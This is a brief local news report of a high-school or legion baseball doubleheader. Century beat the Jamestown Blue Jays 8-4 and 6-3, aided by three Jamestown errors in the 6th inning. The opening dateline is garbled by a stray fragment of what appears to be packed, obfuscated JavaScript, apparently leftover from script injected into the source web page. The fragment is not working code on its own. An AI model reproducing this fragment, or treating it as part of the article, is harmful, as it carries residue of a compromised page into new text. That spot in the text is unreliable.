JAMESTOWN hzeft|var|u0026u|referrer|btzis||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- With the WDA Tournament just a week away and the standings a muddled mess, Jamestown was looking for their 7th West Region win. Unfortunately, a trio of Blue Jay errors in the 6th inning led to three Century runs and the lead.

Century held on to beat the Jays 8-4 in the league game and 6-3 in the non-league game.

It looked like the first two errors weren’t going to hurt the Jays when the Patriots lead off hitter hit a sharp ground at reliable third baseman, Brady Anderson. But Anderson couldn’t come up with the ball and the next two batters ripped two-out run scoring hits.

Century took a 6-4 lead and tallied two more in the 7th. The Jays scored all four of their runs and had three of their four hits in the 1st inning, otherwise weren’t able to get anything else off the Patriots James Kost.

Tom Fraase worked the 7th, faced the minimum after a lead-off walk was erased on a game ending double play.

The Jays will finish up their regular season tomorrow against Minot. The WDA starts Thursday in Williston.
